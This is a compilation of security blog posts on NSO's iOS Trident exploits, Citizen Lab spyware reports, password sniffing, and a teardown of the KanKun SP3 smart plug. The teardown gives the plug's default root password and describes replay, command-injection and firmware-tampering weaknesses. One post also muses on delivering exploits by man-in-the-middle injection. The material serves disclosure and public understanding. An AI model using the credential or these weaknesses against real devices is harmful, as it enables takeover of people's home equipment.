In general, we advocate the 3-2-1 Backup Strategy. Always have three copies of your data. One is your local copy (the data on your iPhone or iPad, for example). The second is a local backup (using iTunes on your Mac or PC, for example). The third is a copy stored safely offsite, in case anything happens – the cloud, for example.

iCloud Backup is one option for offsite backup. Backblaze will back up your computer’s iTunes files, including that local backup. So if you back up to your computer, then use Backblaze, you’re all set.

How do I update my iPhone or iPad?

Follow these steps to make sure iOS 9.3.5 is installed on your device. First of all, make sure your device is charged and connected to a Wi-Fi network.

  1. Tap the iPhone or iPad’s Home button.
  2. Tap Settings.
  3. Tap General.
  4. Tap Software Update.
  5. The device will check for an update. Your device will automatically restart after it’s done.

What do I do now?

Breathe a sigh of relief now that you have iOS 9.3.5 installed. At least until the next security exploit pops up. Just make sure to back up early and often, to make sure your device and your data are safe.

The post iOS 9.3.5 Fixes Malware Exploit: Install It, but Backup First! appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Notes on the Apple/NSO Trident 0days

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/08/notes-on-applenso-trident-0days.html

I thought I’d write up some comments on today’s news of the NSO malware using 0days to infect human rights activist phones. For full reference, you want to read the Citizen Lab report and the Lookout report.

Press: it’s news to you, it’s not news to us

I’m seeing breathless news articles appear. I dread the next time I talk to my mom, when she’s going to ask about it (including “were you involved”). I suppose it is new to those outside the cybersec community, but for those of us insiders, it’s not particularly newsworthy. It’s just more government malware going after activists. It’s just one more set of 0days.

I point this out in case the press wants to contact me for some awesome-sounding quote about how exciting/important this is. I’ll have the opposite quote.

Don’t panic: all patches fix 0days

We should pay attention to context: all patches (for iPhone, Windows, etc.) fix 0days that hackers can use to break into devices. Normally these 0days are discovered by the company itself or by outside researchers intending to fix (and not exploit) the problem. What’s different here is that where most 0days are just a theoretical danger, these 0days are an actual danger — currently being exploited by the NSO Group’s products. Thus, there’s maybe a bit more urgency in this patch compared to other patches.

Don’t panic: NSA/Chinese/Russians using secret 0days anyway

It’s almost certain the NSA, the Chinese, and the Russians have similar 0days. That means applying this patch makes you safe from the NSO Group (for a while, until they find new 0days), but it’s unlikely this patch makes you safe from the others.

Of course it’s multiple 0days

Some people are marveling how the attack includes three 0days. That’s been the norm for browser exploits for a decade now. There’s sandboxes and ASLR protections to get through. There’s privilege escalation to get into the kernel. And then there’s persistence. How far you get in solving one or more of these problems with a single 0day depends upon luck.

It’s actually four 0days

While it wasn’t given a CVE number, there was a fourth 0day: the persistence using the JavaScriptCore binary to run a JavaScript text file. The JavaScriptCore program appears to be only a tool for developers and not needed for the functioning of the phone. It appears that the iOS 9.3.5 patch disables it. While technically it’s not a coding “bug”, it’s still a design bug. 0days solving the persistence problem (where the malware/implant runs when the phone is rebooted) are worth over a hundred thousand dollars all on their own.

That about wraps it up for VEP

VEP is the Vulnerability Equities Process that’s supposed to, but doesn’t, manage how the government uses 0days it acquires.

Agitators like the EFF have been fighting against the NSA’s acquisition and use of 0days, as if this makes us all less secure. What today’s incident shows is that acquisition/use of 0days will be widespread around the world, regardless of what the NSA does. It’d be nice to get more transparency about what the NSA is doing through the VEP process, but the reality is the EFF is never going to get anything close to what it’s agitating for.

That about wraps it up for Wassenaar

Wassenaar is an international arms control “treaty”. Left-wing agitators convinced the Wassenaar folks to add 0days and malware to the treaty — with horrific results. There is essentially no difference between bad code and good code, only how it’s used, so the Wassenaar extensions have essentially outlawed all good code and security research.

Some agitators are convinced Wassenaar can still be fixed (it can’t). Israel, where NSO Group is based, is not a member of Wassenaar, and thus whatever limitations Wassenaar could come up with would not stop the NSO.

Some have pointed out that Israel frequently adopts Wassenaar rules anyway, but in that case NSO would simply transfer the company somewhere else, such as Singapore.

The point is that 0day development is intensely international. There are great 0day researchers throughout the non-Wassenaar countries. It’s not like precision tooling for aluminum cylinders (for nuclear enrichment) that can only be made in an industrialized country. Some of the best 0day researchers come from backwards countries, growing up with only an Internet connection.

BUY THAT MAN AN IPHONE!!!

The victim in this case, Ahmed Mansoor, has apparently been hacked many times, including with HackingTeam’s malware and Finfisher malware — notorious commercial products used by evil governments to hack into dissidents’ computers.

Obviously, he’ll be hacked again. He’s a gold mine for researchers in this area. The NSA, anti-virus companies, Apple jailbreak companies, and the like should be jumping over themselves offering this guy a phone. One way this would work is giving him a new phone every 6 months in exchange for the previous phone to analyze.

Apple, of course, should head the list of companies doing this, providing “activist phones” to activists with their own secret monitoring tools installed so that they can regularly check if some new malware/implant has been installed.

iPhones are still better, suck it Android

Despite the fact that everybody and their mother is buying iPhone 0days to hack phones, it’s still the most secure phone. Androids are open to any old hacker — iPhones are open only to nation-state hackers.

Use Signal, use Tor

I didn’t see Signal on the list of apps the malware tapped into. There’s no particular reason for this, other than that NSO hasn’t gotten around to it yet. But I thought I’d point out how, yet again, Signal wins.

SMS vs. MitM

Some have pointed to SMS as the exploit vector, which gave Citizen Lab the evidence that the phone had been hacked.

It’s a Safari exploit, so getting the user to visit a web page is required. This can be done over SMS, over email, over Twitter, or over any other messaging service the user uses. Presumably, SMS was chosen because users are more paranoid of links in phishing emails than they are SMS messages.

However, the way it should be done is with man-in-the-middle (MitM) tools in the infrastructure. Such a tool would wait until the victim visited any webpage via Safari, then magically append the exploit to the page. As Snowden showed, this is apparently how the NSA does it, which is probably why they haven’t gotten caught yet after exploiting iPhones for years.

The UAE (the government that is almost certainly trying to hack Mansoor’s phone) has, in theory, enough control over its infrastructure to conduct such a hack. We’ve already caught other governments doing similar things (like Tunisia). My guess is they were just lazy, and wanted to do it the easiest way for them.


How the Iranian Government Hacks Dissidents

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/08/how_the_iranian.html

Citizen Lab has a new report on an Iranian government hacking program that targets dissidents. From a Washington Post op-ed by Ron Deibert:

Al-Ameer is a net savvy activist, and so when she received a legitimate looking email containing a PowerPoint attachment addressed to her and purporting to detail “Assad Crimes,” she could easily have opened it. Instead, she shared it with us at the Citizen Lab.

As we detail in a new report, the attachment led our researchers to uncover an elaborate cyberespionage campaign operating out of Iran. Among the malware was a malicious spyware, including a remote access tool called “Droidjack,” that allows attackers to silently control a mobile device. When Droidjack is installed, a remote user can turn on the microphone and camera, remove files, read encrypted messages, and send spoofed instant messages and emails. Had she opened it, she could have put herself, her friends, her family and her associates back in Syria in mortal danger.

Here’s the report. And a news article.

I’ve bought some more awful IoT stuff

Post Syndicated from Matthew Garrett original http://mjg59.dreamwidth.org/43486.html

I bought some awful WiFi lightbulbs a few months ago. The short version: they introduced terrible vulnerabilities on your network, they violated the GPL and they were also just bad at being lightbulbs. Since then I’ve bought some other Internet of Things devices, and since people seem to have a bizarre level of fascination with figuring out just what kind of fractal of poor design choices these things frequently embody, I thought I’d oblige.

Today we’re going to be talking about the KanKun SP3, a plug that’s been around for a while. The idea here is pretty simple – there’s lots of devices that you’d like to be able to turn on and off in a programmatic way, and rather than rewiring them the simplest thing to do is just to insert a control device in between the wall and the device, and now you can turn your foot bath on and off from your phone. Most vendors go further and also allow you to program timers and even provide some sort of remote tunneling protocol so you can turn off your lights from the comfort of somebody else’s home.

The KanKun has all of these features and a bunch more, although when I say “features” I kind of mean the opposite. I plugged mine in and followed the install instructions. As is pretty typical, this took the form of the plug bringing up its own Wifi access point, the app on the phone connecting to it and sending configuration data, and the plug then using that data to join your network. Except it didn’t work. I connected to the plug’s network, gave it my SSID and password and waited. Nothing happened. No useful diagnostic data. Eventually I plugged my phone into my laptop and ran adb logcat, and the Android debug logs told me that the app was trying to modify a network that it hadn’t created. Apparently this isn’t permitted as of Android 6, but the app was handling this denial by just trying again. I deleted the network from the system settings, restarted the app, and this time the app created the network record and could modify it. It still didn’t work, but that’s because it let me give it a 5GHz network and it only has a 2.4GHz radio, so one reset later and I finally had it online.

The first thing I normally do to one of these things is run nmap with the -O argument, which gives you an indication of what OS it’s running. I didn’t really need to in this case, because if I just telnetted to port 22 I got a dropbear ssh banner. Googling turned up the root password (“p9z34c”) and I was logged into a lightly hacked (and fairly obsolete) OpenWRT environment.
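
The same fingerprinting works with a three-line banner grab; a Python sketch (the address below is a placeholder for whatever IP the plug picked up on your LAN):

    import socket

    def banner(host, port=22, timeout=5):
        """Read whatever the service volunteers first; a Dropbear SSH
        greeting is enough to identify an embedded OpenWRT-ish system."""
        with socket.create_connection((host, port), timeout=timeout) as s:
            return s.recv(256).decode(errors="replace").strip()

    print(banner("192.168.1.254"))   # placeholder LAN address for the plug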

It turns out that there’s a whole community of people playing with these plugs, and it’s common for people to install CGI scripts on them so they can turn them on and off via an API. At first this sounds somewhat confusing, because if the phone app can control the plug then there clearly is some kind of API, right? Well ha yeah ok that’s a great question and oh good lord do things start getting bad quickly at this point.

I’d grabbed the apk for the app and a copy of jadx, an incredibly useful piece of code that’s surprisingly good at turning compiled Android apps into something resembling Java source. I dug through that for a while before figuring out that before packets were being sent, they were being handed off to some sort of encryption code. I couldn’t find that in the app, but there was a native ARM library shipped with it. Running strings on that showed functions with names matching the calls in the Java code, so that made sense. There were also references to AES, which explained why when I ran tcpdump I only saw bizarre garbage packets.

But what was surprising was that most of these packets were substantially similar. There were a load that were identical other than a 16-byte chunk in the middle. That plus the fact that every payload length was a multiple of 16 bytes strongly indicated that AES was being used in ECB mode. In ECB mode each plaintext is split up into 16-byte chunks and encrypted with the same key. The same plaintext will always result in the same encrypted output. This implied that the packets were substantially similar and that the encryption key was static.
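
Spotting ECB in a capture is mechanical; a minimal Python sketch of the repeated-block heuristic:

    def looks_like_ecb(ciphertext: bytes, block_size=16):
        """Heuristic ECB detector: in ECB mode identical plaintext blocks
        encrypt to identical ciphertext blocks, so repeats give it away."""
        if len(ciphertext) % block_size:
            return False  # AES ciphertext lengths are multiples of 16
        blocks = [ciphertext[i:i + block_size]
                  for i in range(0, len(ciphertext), block_size)]
        return len(set(blocks)) < len(blocks)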

Some more digging showed that someone had figured out the encryption key last year, and that someone else had written some tools to control the plug without needing to modify it. The protocol is basically ascii and consists mostly of the MAC address of the target device, a password and a command. This is then encrypted and sent to the device’s IP address. The device then sends a challenge packet containing a random number. The app has to decrypt this, obtain the random number, create a response, encrypt that and send it before the command takes effect. This avoids the most obvious weakness around using ECB – since the same plaintext always encrypts to the same ciphertext, you could just watch encrypted packets go past and replay them to get the same effect, even if you didn’t have the encryption key. Using a random number in a challenge forces you to prove that you actually have the key.

At least, it would do if the numbers were actually random. It turns out that the plug is just calling rand(). Further, it turns out that it never calls srand(). This means that the plug will always generate the same sequence of challenges after a reboot, which means you can still carry out replay attacks if you can reboot the plug. Strong work.
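
The flaw is easy to model: an RNG that is never seeded produces the same stream after every boot. A Python sketch, using a fixed seed to stand in for the missing srand() call:

    import random

    def challenges_after_boot(n=3):
        # A fixed seed stands in for never calling srand(): every boot
        # replays exactly the same "random" challenge sequence.
        rng = random.Random(0)
        return [rng.getrandbits(32) for _ in range(n)]

    # Two "boots" yield identical challenges, so recorded responses can
    # simply be replayed after forcing the plug to reboot.
    assert challenges_after_boot() == challenges_after_boot()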

But there was still the question of how the remote control works, since the code on github only worked locally. tcpdumping the traffic from the server and trying to decrypt it in the same way as local packets worked fine, and showed that the only difference was that the packet started “wan” rather than “lan”. The server decrypts the packet, looks at the MAC address, re-encrypts it and sends it over the tunnel to the plug that registered with that address.

That’s not really a great deal of authentication. The protocol permits a password, but the app doesn’t insist on it – some quick playing suggests that about 90% of these devices still use the default password. And the devices are all based on the same wifi module, so the MAC addresses are all in the same range. The process of sending status check packets to the server with every MAC address wouldn’t take that long and would tell you how many of these devices are out there. If they’re using the default password, that’s enough to have full control over them.

There are some other failings. The github repo mentioned earlier includes a script that allows arbitrary command execution – the wifi configuration information is passed to the system() command, so leaving a semicolon in the middle of it will result in your own commands being executed. Thankfully this doesn’t seem to be true of the daemon that’s listening for the remote control packets, which seems to restrict its use of system() to data entirely under its control. But even if you change the default root password, anyone on your local network can get root on the plug. So that’s a thing. It also downloads firmware updates over http and doesn’t appear to check signatures on them, so there’s the potential for MITM attacks on the plug itself. The remote control server is on AWS unless your timezone is GMT+8, in which case it’s in China. Sorry, Western Australia.

It’s running Linux and includes Busybox and dnsmasq, so plenty of GPLed code. I emailed the manufacturer asking for a copy and got told that they wouldn’t give it to me, which is unsurprising but still disappointing.

The use of AES is still somewhat confusing, given the relatively small amount of security it provides. One thing I’ve wondered is whether it’s not actually intended to provide security at all. The remote servers need to accept connections from anywhere and funnel decent amounts of traffic around from phones to switches. If that weren’t restricted in any way, competitors would be able to use existing servers rather than setting up their own. Using AES at least provides a minor obstacle that might encourage them to set up their own server.

Overall: the hardware seems fine, the software is shoddy and the security is terrible. If you have one of these, set a strong password. There’s no rate-limiting on the server, so a weak password will be broken pretty quickly. It’s also infringing my copyright, so I’d recommend against it on that point alone.


Stealth Falcon: New Malware from (Probably) the UAE

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2016/06/stealth_falcon_.html

Citizen Lab has the details:

This report describes a campaign of targeted spyware attacks carried out by a sophisticated operator, which we call Stealth Falcon. The attacks have been conducted from 2012 until the present, against Emirati journalists, activists, and dissidents. We discovered this campaign when an individual purporting to be from an apparently fictitious organization called “The Right to Fight” contacted Rori Donaghy. Donaghy, a UK-based journalist and founder of the Emirates Center for Human Rights, received a spyware-laden email in November 2015, purporting to offer him a position on a human rights panel. Donaghy has written critically of the United Arab Emirates (UAE) government in the past, and had recently published a series of articles based on leaked emails involving members of the UAE government.

Circumstantial evidence suggests a link between Stealth Falcon and the UAE government. We traced digital artifacts used in this campaign to links sent from an activist’s Twitter account in December 2012, a period when it appears to have been under government control. We also identified other bait content employed by this threat actor. We found 31 public tweets sent by Stealth Falcon, 30 of which were directly targeted at one of 27 victims. Of the 27 targets, 24 were obviously linked to the UAE, based on their profile information (e.g., photos, “UAE” in account name, location), and at least six targets appeared to be operated by people who were arrested, sought for arrest, or convicted in absentia by the UAE government, in relation to their Twitter activity.

The attack on Donaghy — and the Twitter attacks — involved a malicious URL shortening site. When a user clicks on a URL shortened by Stealth Falcon operators, the site profiles the software on a user’s computer, perhaps for future exploitation, before redirecting the user to a benign website containing bait content. We queried the URL shortener with every possible short URL, and identified 402 instances of bait content which we believe were sent by Stealth Falcon, 73% of which obviously referenced UAE issues. Of these URLs, only the one sent to Donaghy definitively contained spyware. However, we were able to trace the spyware Donaghy received to a network of 67 active command and control (C2) servers, suggesting broader use of the spyware, perhaps by the same or other operators.

News story.

Technology betrays everyone

Post Syndicated from Robert Graham original http://blog.erratasec.com/2016/05/technology-betrays-everyone.html

Kelly Jackson Higgins has a story about how I hacked her 10 years ago, by sniffing her email password via WiFi and displaying it on screen. It wasn’t her fault — it was technology’s fault. Sooner or later, it will betray you.

The same thing happened to me at CanSecWest around the year 2001, for pretty much exactly the same reasons. I think it was HD Moore who sniffed my email password. The thing is, I’m an expert, who writes tools that sniff these passwords, so it wasn’t like I was an innocent party here. Instead, simply opening my laptop with Outlook running in the background was enough for it to automatically connect to WiFi, then connect to a POP3 server across the Internet. I thought I was in control of the evil technology — but this incident proved I wasn’t.

By 2006, though, major email services were supporting email wholly across SSL, so that this would no longer happen — in theory. In practice, they still left the old non-encrypted ports open. Users could secure themselves, if they tried hard, but usually they weren’t secured.

Today, in 2016, the situation is much better. If you use Yahoo! Mail or GMail, you don’t even have the option to not encrypt — even if you wanted to. Unfortunately, many people are using old services that haven’t upgraded, like EarthLink or Network Solutions. These were popular services during the dot-com era 20 years ago, but haven’t evolved since. They spend enough to keep the lights on, but not enough to keep up with the times. Indeed, EarthLink doesn’t even offer encryption if you want it, as an earlier story this year showed.

My presentation in 2006 wasn’t about email passwords, but about all the other junk that leaks private information. Specifically, I discussed WiFi MAC addresses, and how they can be used to track mobile devices. Only in the last couple years have mobile phone vendors done something to change this. The latest version of iOS 9 will now randomize the MAC address, so that “they” can no longer easily track you by it.
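
Randomized addresses are ordinary locally administered MACs; the bit layout is standard, though the sketch itself is just illustrative Python:

    import random

    def random_mac():
        """Generate a unicast, locally administered MAC address, the
        class of address used for randomized WiFi probe requests."""
        first = (random.randrange(256) | 0x02) & ~0x01  # local bit on, multicast bit off
        octets = [first] + [random.randrange(256) for _ in range(5)]
        return ":".join(f"{b:02x}" for b in octets)

    print(random_mac())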

The point of this post is this. If you are thinking “surely my tech won’t harm me in stupid ways”, you are wrong. It will. Even if it says on the box “100% secure”, it’s not secure. Indeed, those who promise the most often deliver the least. Those at the forefront of innovation (Apple, Google, and Facebook) do better, but even they must be treated with a healthy dose of skepticism.

So what’s the answer? Paranoia and knowledge. First, never put too much faith in the tech. It’s not enough, for example, for encryption to be an option — you want encryption enforced so that unencrypted is not an option. Second, learn how things work. Learn why SSL works the way it does, why it’s POP3S and not POP3, and why “certificate warnings” are a thing. The more important security is to you, the more conservative your paranoia and the more extensive your knowledge should become.
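
To make the POP3-versus-POP3S point concrete, here’s a sketch of an implicit-TLS connection on port 995 (the hostname is a placeholder):

    import socket
    import ssl

    # POP3S wraps the whole session in TLS on port 995, so the password
    # never crosses the wire in the clear; plain POP3 on port 110 hands
    # it to anyone sniffing the WiFi.
    HOST = "pop.example.com"   # placeholder mail server
    ctx = ssl.create_default_context()
    with socket.create_connection((HOST, 995), timeout=10) as raw:
        with ctx.wrap_socket(raw, server_hostname=HOST) as tls:
            print(tls.recv(256).decode(errors="replace"))  # "+OK" greeting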

Appendix: Early this year, the EFF (Electronic Frontier Foundation) had a chart of various chat applications and their features (end-to-end, open-source, etc.). On one hand, it was good information. On the other hand, it was bad, in that it still wasn’t enough for the non-knowledgeable to make a good decision. They could easily pick a chat app that had all the right features (green check-marks across the board), but still one that could easily be defeated.

Likewise, recommendations to use “Tor” are perilous. Tor is indeed a good thing, but if you blindly trust it without understanding it, it will quickly betray you. If your adversary is the secret police of your country cracking down on dissidents, then you need to learn a lot more about how Tor works before you can trust it.

Notes: I’m sorta required to write this post, since I can’t let it go unremarked that the same thing happened to me — even though I know better.